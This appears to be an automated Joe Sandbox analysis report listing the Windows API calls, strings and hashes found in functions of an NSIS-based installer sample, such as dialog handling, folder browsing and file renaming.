                                                                                                              • Associated: 00000004.00000002.3285386259.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_400000_FILHKLtCw0.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Window$Item$MessageSend$EnableShow$LongMenu$ClassDestroyEnabledSystemTextlstrlen
                                                                                                              • String ID:
                                                                                                              • API String ID: 184305955-0
                                                                                                              • Opcode ID: 1f500e8277606cc2b60b0699cfffcfb82421e5b85fdc00a0e0ef9cc185334c76
                                                                                                              • Instruction ID: ea0d75974b1de0ff06d17ebe4cf6f8c3df4269cbbec1c2e45b889e3be151f72f
                                                                                                              • Opcode Fuzzy Hash: 1f500e8277606cc2b60b0699cfffcfb82421e5b85fdc00a0e0ef9cc185334c76
                                                                                                              • Instruction Fuzzy Hash: 51C1AEB1604300ABDB206F61ED85E2B7AA8EB94706F50053EF641B61F0CB7999529B2D
                                                                                                              APIs
                                                                                                              • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 00404354
                                                                                                              • GetDlgItem.USER32(?,000003E8), ref: 00404368
                                                                                                              • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 00404385
                                                                                                              • GetSysColor.USER32(?), ref: 00404396
                                                                                                              • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 004043A4
                                                                                                              • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 004043B2
                                                                                                              • lstrlenW.KERNEL32(?), ref: 004043B7
                                                                                                              • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 004043C4
                                                                                                              • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 004043D9
                                                                                                              • GetDlgItem.USER32(?,0000040A), ref: 00404432
                                                                                                              • SendMessageW.USER32(00000000), ref: 00404439
                                                                                                              • GetDlgItem.USER32(?,000003E8), ref: 00404464
                                                                                                              • SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 004044A7
                                                                                                              • LoadCursorW.USER32(00000000,00007F02), ref: 004044B5
                                                                                                              • SetCursor.USER32(00000000), ref: 004044B8
                                                                                                              • ShellExecuteW.SHELL32(0000070B,open,00432EA0,00000000,00000000,00000001), ref: 004044CD
                                                                                                              • LoadCursorW.USER32(00000000,00007F00), ref: 004044D9
                                                                                                              • SetCursor.USER32(00000000), ref: 004044DC
                                                                                                              • SendMessageW.USER32(00000111,00000001,00000000), ref: 0040450B
                                                                                                              • SendMessageW.USER32(00000010,00000000,00000000), ref: 0040451D
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.3285321595.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.3285304936.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.3285341884.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.3285359778.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.3285386259.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_400000_FILHKLtCw0.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorExecuteShelllstrlen
                                                                                                              • String ID: -B@$N$open
                                                                                                              • API String ID: 3615053054-1057335957
                                                                                                              • Opcode ID: 36576130f872884c293bcf5f2af5e47814bd4f236bd745ad96bf50452987c1a6
                                                                                                              • Instruction ID: dd3f9e4c49c61f52868447dcb3d39b77a72b713ccf0d54d9464424dd5907340f
                                                                                                              • Opcode Fuzzy Hash: 36576130f872884c293bcf5f2af5e47814bd4f236bd745ad96bf50452987c1a6
                                                                                                              • Instruction Fuzzy Hash: E87190B1900209BFDB109F61DD89EAA7B69FB84355F00803AFB05BA1D0C778AD51CF98
                                                                                                              APIs
                                                                                                                • Part of subcall function 0040642B: GetModuleHandleA.KERNEL32(?,?,00000020,0040330C,00000009,SETUPAPI,USERENV,UXTHEME), ref: 0040643D
                                                                                                                • Part of subcall function 0040642B: GetProcAddress.KERNEL32(00000000,?), ref: 00406458
                                                                                                              • lstrcatW.KERNEL32(00441000,0042D268,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042D268,00000000,00000002,75923420,00441800,00000000,0043F000), ref: 0040391F
                                                                                                              • lstrlenW.KERNEL32(00432EA0,?,?,?,00432EA0,00000000,0043F800,00441000,0042D268,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042D268,00000000,00000002,75923420), ref: 0040399F
                                                                                                              • lstrcmpiW.KERNEL32(00432E98,.exe,00432EA0,?,?,?,00432EA0,00000000,0043F800,00441000,0042D268,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042D268,00000000), ref: 004039B2
                                                                                                              • GetFileAttributesW.KERNEL32(00432EA0), ref: 004039BD
                                                                                                              • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,0043F800), ref: 00403A06
                                                                                                                • Part of subcall function 00405F9C: wsprintfW.USER32 ref: 00405FA9
                                                                                                              • RegisterClassW.USER32(00433EA0), ref: 00403A43
                                                                                                              • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403A5B
                                                                                                              • CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403A90
                                                                                                              • ShowWindow.USER32(00000005,00000000), ref: 00403AC6
                                                                                                              • GetClassInfoW.USER32(00000000,RichEdit20W,00433EA0), ref: 00403AF2
                                                                                                              • GetClassInfoW.USER32(00000000,RichEdit,00433EA0), ref: 00403AFF
                                                                                                              • RegisterClassW.USER32(00433EA0), ref: 00403B08
                                                                                                              • DialogBoxParamW.USER32(?,00000000,00403C41,00000000), ref: 00403B27
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.3285321595.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.3285304936.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.3285341884.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.3285359778.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.3285386259.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_400000_FILHKLtCw0.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                                                                              • String ID: .DEFAULT\Control Panel\International$.exe$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
                                                                                                              • API String ID: 1975747703-1115850852
                                                                                                              • Opcode ID: d5c3abf15ba9808ba33f498f7a164742ef658a4c3e7242e85e78716b4e36e908
                                                                                                              • Instruction ID: 3415ad5ee5f1eed3d2c0e447cb4c4d8a0153f3b0974deb3f023f39c7f2583bdf
                                                                                                              • Opcode Fuzzy Hash: d5c3abf15ba9808ba33f498f7a164742ef658a4c3e7242e85e78716b4e36e908
                                                                                                              • Instruction Fuzzy Hash: A361CA706406006FD320AF66AD46F2B3A6CEB8474AF40553FF941B22E2DB7D5D41CA2D
                                                                                                              APIs
                                                                                                              • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                                                                              • BeginPaint.USER32(?,?), ref: 00401047
                                                                                                              • GetClientRect.USER32(?,?), ref: 0040105B
                                                                                                              • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                                                                              • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                                                                                              • DeleteObject.GDI32(?), ref: 004010ED
                                                                                                              • CreateFontIndirectW.GDI32(?), ref: 00401105
                                                                                                              • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                                                                              • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                                                                              • SelectObject.GDI32(00000000,?), ref: 00401140
                                                                                                              • DrawTextW.USER32(00000000,00433F00,000000FF,00000010,00000820), ref: 00401156
                                                                                                              • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                                                                              • DeleteObject.GDI32(?), ref: 00401165
                                                                                                              • EndPaint.USER32(?,?), ref: 0040116E
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.3285321595.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.3285304936.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.3285341884.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.3285359778.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.3285386259.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_400000_FILHKLtCw0.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                                                              • String ID: F
                                                                                                              • API String ID: 941294808-1304234792
                                                                                                              • Opcode ID: 836f1adf353e2d325b24016f8fe56e8870fd4280f6f4b89fbeb337628f0c6723
                                                                                                              • Instruction ID: 6108585e84898fc0a566315ef3a84ca8793ce744416779fac967068cfe9173e2
                                                                                                              • Opcode Fuzzy Hash: 836f1adf353e2d325b24016f8fe56e8870fd4280f6f4b89fbeb337628f0c6723
                                                                                                              • Instruction Fuzzy Hash: 0E418A71800209AFCB058F95DE459AFBBB9FF44310F04842EF991AA1A0C738EA54DFA4
                                                                                                              APIs
                                                                                                              • lstrcpyW.KERNEL32(00430908,NUL,?,00000000,?,0040A300,00405F17,?,?), ref: 00405D93
                                                                                                              • CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,0040A300,00405F17,?,?), ref: 00405DB7
                                                                                                              • GetShortPathNameW.KERNEL32(?,00430908,00000400), ref: 00405DC0
                                                                                                                • Part of subcall function 00405B8F: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405E70,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405B9F
                                                                                                                • Part of subcall function 00405B8F: lstrlenA.KERNEL32(00000000,?,00000000,00405E70,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405BD1
                                                                                                              • GetShortPathNameW.KERNEL32(00431108,00431108,00000400), ref: 00405DDD
                                                                                                              • wsprintfA.USER32 ref: 00405DFB
                                                                                                              • GetFileSize.KERNEL32(00000000,00000000,00431108,C0000000,00000004,00431108,?,?,?,?,?), ref: 00405E36
                                                                                                              • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00405E45
                                                                                                              • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E7D
                                                                                                              • SetFilePointer.KERNEL32(0040A578,00000000,00000000,00000000,00000000,00430508,00000000,-0000000A,0040A578,00000000,[Rename],00000000,00000000,00000000), ref: 00405ED3
                                                                                                              • GlobalFree.KERNEL32(00000000), ref: 00405EE4
                                                                                                              • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00405EEB
                                                                                                                • Part of subcall function 00405C2A: GetFileAttributesW.KERNEL32(00000003,00402E2E,00442800,80000000,00000003,?,?,00000000,0040353A,?), ref: 00405C2E
                                                                                                                • Part of subcall function 00405C2A: CreateFileW.KERNEL32(?,?,00000001,00000000,?,00000001,00000000,?,?,00000000,0040353A,?), ref: 00405C50
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.3285321595.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.3285304936.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.3285341884.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.3285359778.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.3285386259.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_400000_FILHKLtCw0.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: File$CloseGlobalHandleNamePathShortlstrcpylstrlen$AllocAttributesCreateFreePointerSizewsprintf
                                                                                                              • String ID: %ls=%ls$NUL$[Rename]
                                                                                                              • API String ID: 222337774-899692902
                                                                                                              • Opcode ID: f6fb36cc51022f7a2fd4840f1f55d7684ca34511e2c34b0b855416ece56c70d0
                                                                                                              • Instruction ID: 58c57230207582c12286da0908ad594a16be4941a6f2872b3690da29fc8d014c
                                                                                                              • Opcode Fuzzy Hash: f6fb36cc51022f7a2fd4840f1f55d7684ca34511e2c34b0b855416ece56c70d0
                                                                                                              • Instruction Fuzzy Hash: 01311370600B18BBD2206B219D49F6B3A5CEF45755F14043AB981F62D2EE7CAA01CAAD
                                                                                                              APIs
                                                                                                              • GetDlgItem.USER32(?,000003FB), ref: 00404603
                                                                                                              • SetWindowTextW.USER32(00000000,?), ref: 0040462D
                                                                                                              • SHBrowseForFolderW.SHELL32(?), ref: 004046DE
                                                                                                              • CoTaskMemFree.OLE32(00000000), ref: 004046E9
                                                                                                              • lstrcmpiW.KERNEL32(00432EA0,0042D268,00000000,?,?), ref: 0040471B
                                                                                                              • lstrcatW.KERNEL32(?,00432EA0), ref: 00404727
                                                                                                              • SetDlgItemTextW.USER32(?,000003FB,?), ref: 00404739
                                                                                                                • Part of subcall function 0040577E: GetDlgItemTextW.USER32(?,?,00000400,00404770), ref: 00405791
                                                                                                                • Part of subcall function 004062E9: CharNextW.USER32(0040A300,*?|<>/":,00000000,0043F000,75923420,00441800,00000000,0040327B,00441800,00441800,004034CC), ref: 0040634C
                                                                                                                • Part of subcall function 004062E9: CharNextW.USER32(0040A300,0040A300,0040A300,00000000), ref: 0040635B
                                                                                                                • Part of subcall function 004062E9: CharNextW.USER32(0040A300,0043F000,75923420,00441800,00000000,0040327B,00441800,00441800,004034CC), ref: 00406360
                                                                                                                • Part of subcall function 004062E9: CharPrevW.USER32(0040A300,0040A300,75923420,00441800,00000000,0040327B,00441800,00441800,004034CC), ref: 00406373
                                                                                                              • GetDiskFreeSpaceW.KERNEL32(0042B238,?,?,0000040F,?,0042B238,0042B238,?,00000001,0042B238,?,?,000003FB,?), ref: 004047FC
                                                                                                              • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404817
                                                                                                                • Part of subcall function 00404970: lstrlenW.KERNEL32(0042D268,0042D268,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404A11
                                                                                                                • Part of subcall function 00404970: wsprintfW.USER32 ref: 00404A1A
                                                                                                                • Part of subcall function 00404970: SetDlgItemTextW.USER32(?,0042D268), ref: 00404A2D
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.3285321595.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.3285304936.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.3285341884.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.3285359778.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.3285386259.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_400000_FILHKLtCw0.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                                                                                              • String ID: A
                                                                                                              • API String ID: 2624150263-3554254475
                                                                                                              • Opcode ID: 7533d7c2dc95967098a321fa3339fb28748da65ff8be7a50b8b52b895c48c278
                                                                                                              • Instruction ID: 407ae004ccebb682b028ef0dda1631611b85a4c4b0528499d59b6de2b9b5396a
                                                                                                              • Opcode Fuzzy Hash: 7533d7c2dc95967098a321fa3339fb28748da65ff8be7a50b8b52b895c48c278
                                                                                                              • Instruction Fuzzy Hash: 9CA171B1900208ABDB11AFA6CD85AAF77B8EF84314F10843BF601B72D1D77C89418B69
                                                                                                              APIs
                                                                                                              • GetTickCount.KERNEL32 ref: 00402DFF
                                                                                                              • GetModuleFileNameW.KERNEL32(00000000,00442800,00000400,?,?,00000000,0040353A,?), ref: 00402E1B
                                                                                                                • Part of subcall function 00405C2A: GetFileAttributesW.KERNEL32(00000003,00402E2E,00442800,80000000,00000003,?,?,00000000,0040353A,?), ref: 00405C2E
                                                                                                                • Part of subcall function 00405C2A: CreateFileW.KERNEL32(?,?,00000001,00000000,?,00000001,00000000,?,?,00000000,0040353A,?), ref: 00405C50
                                                                                                              • GetFileSize.KERNEL32(00000000,00000000,00443000,00000000,00440800,00440800,00442800,00442800,80000000,00000003,?,?,00000000,0040353A,?), ref: 00402E67
                                                                                                              Strings
                                                                                                              • Inst, xrefs: 00402ED3
                                                                                                              • Null, xrefs: 00402EE5
                                                                                                              • (*B, xrefs: 00402E7C
                                                                                                              • soft, xrefs: 00402EDC
                                                                                                              • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 00402FC6
                                                                                                              • Error launching installer, xrefs: 00402E3E
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.3285321595.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.3285304936.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.3285341884.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.3285359778.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.3285386259.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_400000_FILHKLtCw0.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: File$AttributesCountCreateModuleNameSizeTick
                                                                                                              • String ID: (*B$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                                                                                              • API String ID: 4283519449-2478819026
                                                                                                              • Opcode ID: af3239711416cc3f4489103c4f5988a16c87e5acef6a1f1d228726abe2e37e97
                                                                                                              • Instruction ID: 7d4f9fc7c678da67c97c1a1890296b71ec8e814f853b941ab64c238268a70fe9
                                                                                                              • Opcode Fuzzy Hash: af3239711416cc3f4489103c4f5988a16c87e5acef6a1f1d228726abe2e37e97
                                                                                                              • Instruction Fuzzy Hash: AF51F731904205ABDB209F61DE89B9F7BB8EB44394F14403BF904B62C1C7B89D409BAD
                                                                                                              APIs
                                                                                                              • GetVersion.KERNEL32(00000000,0042C248,?,004051EB,0042C248,00000000,00000000,?), ref: 0040613A
                                                                                                              • GetSystemDirectoryW.KERNEL32(00432EA0,00000400), ref: 004061B8
                                                                                                              • GetWindowsDirectoryW.KERNEL32(00432EA0,00000400), ref: 004061CB
                                                                                                              • SHGetSpecialFolderLocation.SHELL32(?,?), ref: 00406207
                                                                                                              • SHGetPathFromIDListW.SHELL32(?,00432EA0), ref: 00406215
                                                                                                              • CoTaskMemFree.OLE32(?), ref: 00406220
                                                                                                              • lstrcatW.KERNEL32(00432EA0,\Microsoft\Internet Explorer\Quick Launch), ref: 00406244
                                                                                                              • lstrlenW.KERNEL32(00432EA0,00000000,0042C248,?,004051EB,0042C248,00000000,00000000,?), ref: 0040629E
                                                                                                              Strings
                                                                                                              • \Microsoft\Internet Explorer\Quick Launch, xrefs: 0040623E
                                                                                                              • Software\Microsoft\Windows\CurrentVersion, xrefs: 00406186
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.3285321595.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.3285304936.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.3285341884.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.3285359778.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.3285386259.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_400000_FILHKLtCw0.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskVersionWindowslstrcatlstrlen
                                                                                                              • String ID: Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                                                                              • API String ID: 900638850-730719616
                                                                                                              • Opcode ID: b49515e533b40e1408f5d93883df29fa5190ace2cf2b8e5a57d609063371b42f
                                                                                                              • Instruction ID: e2b9bd4c7d0941b93a588dc58e8d14d5200dcae9cd5da35c43f1ba43b89dddbc
                                                                                                              • Opcode Fuzzy Hash: b49515e533b40e1408f5d93883df29fa5190ace2cf2b8e5a57d609063371b42f
                                                                                                              • Instruction Fuzzy Hash: 79610371A00504EBDF20AF64CC40BAE37A5AF55324F16817FE942BA2D0D73D9AA1CB4D
                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.3285321595.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.3285304936.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.3285341884.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.3285359778.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.3285386259.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_400000_FILHKLtCw0.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: CountTick$wsprintf
                                                                                                              • String ID: jA$ jA$... %d%%
                                                                                                              • API String ID: 551687249-2167919867
                                                                                                              • Opcode ID: e07d926733e31303047b785d6e8e1ef749c31aa3f1888e26d22e6b527b659153
                                                                                                              • Instruction ID: 9abceb1f43df10d1a821086e1d45a58eca4464abfa5f2a46825b956852eb5d51
                                                                                                              • Opcode Fuzzy Hash: e07d926733e31303047b785d6e8e1ef749c31aa3f1888e26d22e6b527b659153
                                                                                                              • Instruction Fuzzy Hash: AF517C71901259EBDB10CF65DA44BAE7BB8AF05766F10417FF811B62C0C7789E40CBAA
                                                                                                              APIs
                                                                                                              • GetWindowLongW.USER32(?,000000EB), ref: 0040419D
                                                                                                              • GetSysColor.USER32(00000000), ref: 004041B9
                                                                                                              • SetTextColor.GDI32(?,00000000), ref: 004041C5
                                                                                                              • SetBkMode.GDI32(?,?), ref: 004041D1
                                                                                                              • GetSysColor.USER32(?), ref: 004041E4
                                                                                                              • SetBkColor.GDI32(?,?), ref: 004041F4
                                                                                                              • DeleteObject.GDI32(?), ref: 0040420E
                                                                                                              • CreateBrushIndirect.GDI32(?), ref: 00404218
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.3285321595.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.3285304936.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.3285341884.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.3285359778.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.3285386259.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_400000_FILHKLtCw0.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                                                              • String ID:
                                                                                                              • API String ID: 2320649405-0
                                                                                                              • Opcode ID: 1be7c14e932793da5b7e12cfd745236bd09d54aa5f4605660dea7ebeed684375
                                                                                                              • Instruction ID: dec6db0c7b043789455d5ba444b9f0b4b6699da27fefac44a21b5edf9a5b929b
                                                                                                              • Opcode Fuzzy Hash: 1be7c14e932793da5b7e12cfd745236bd09d54aa5f4605660dea7ebeed684375
                                                                                                              • Instruction Fuzzy Hash: E321C3B1500704ABCB219F68EE08B4BBBF8AF40710F04896DF996F66A0C734E944CB64
                                                                                                              APIs
                                                                                                              • ReadFile.KERNEL32(?,?,?,?), ref: 0040264D
                                                                                                              • MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 00402688
                                                                                                              • SetFilePointer.KERNEL32(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 004026AB
                                                                                                              • MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 004026C1
                                                                                                                • Part of subcall function 00405D0B: SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 00405D21
                                                                                                              • SetFilePointer.KERNEL32(?,?,?,00000001,?,?,00000002), ref: 0040276D
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.3285321595.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.3285304936.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.3285341884.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.3285359778.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.3285386259.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_400000_FILHKLtCw0.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: File$Pointer$ByteCharMultiWide$Read
                                                                                                              • String ID: 9
                                                                                                              • API String ID: 163830602-2366072709
                                                                                                              • Opcode ID: 1e0cadf04f88ccade5697334c954c2e9868fb264b6ac47f65209ed57e79425ed
                                                                                                              • Instruction ID: c11c119823ef092d14edb4d445d1eebecf1e4ba29e3308019af08aa6c5ad61e3
                                                                                                              • Opcode Fuzzy Hash: 1e0cadf04f88ccade5697334c954c2e9868fb264b6ac47f65209ed57e79425ed
                                                                                                              • Instruction Fuzzy Hash: 43510874D00219AADF209F94CA88ABEB779FF04344F50447BE501B72E0D7B99D42DB69
                                                                                                              APIs
                                                                                                              • lstrlenW.KERNEL32(0042C248,00000000,?,759223A0,?,?,?,?,?,?,?,?,?,0040318B,00000000,?), ref: 004051EC
                                                                                                              • lstrlenW.KERNEL32(0040318B,0042C248,00000000,?,759223A0,?,?,?,?,?,?,?,?,?,0040318B,00000000), ref: 004051FC
                                                                                                              • lstrcatW.KERNEL32(0042C248,0040318B,0040318B,0042C248,00000000,?,759223A0), ref: 0040520F
                                                                                                              • SetWindowTextW.USER32(0042C248,0042C248), ref: 00405221
                                                                                                              • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405247
                                                                                                              • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405261
                                                                                                              • SendMessageW.USER32(?,00001013,?,00000000), ref: 0040526F
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.3285321595.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.3285304936.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.3285341884.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.3285359778.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.3285386259.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_400000_FILHKLtCw0.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                                                                              • String ID:
                                                                                                              • API String ID: 2531174081-0
                                                                                                              • Opcode ID: 8e6bf81ce48c4b2cdbfca5526b135b5755e0331aa1f53bcdb355af2f73056803
                                                                                                              • Instruction ID: bea5982b108369c56cf3d35f12f42b62494ffc2cb206b3c5387e037ca996873b
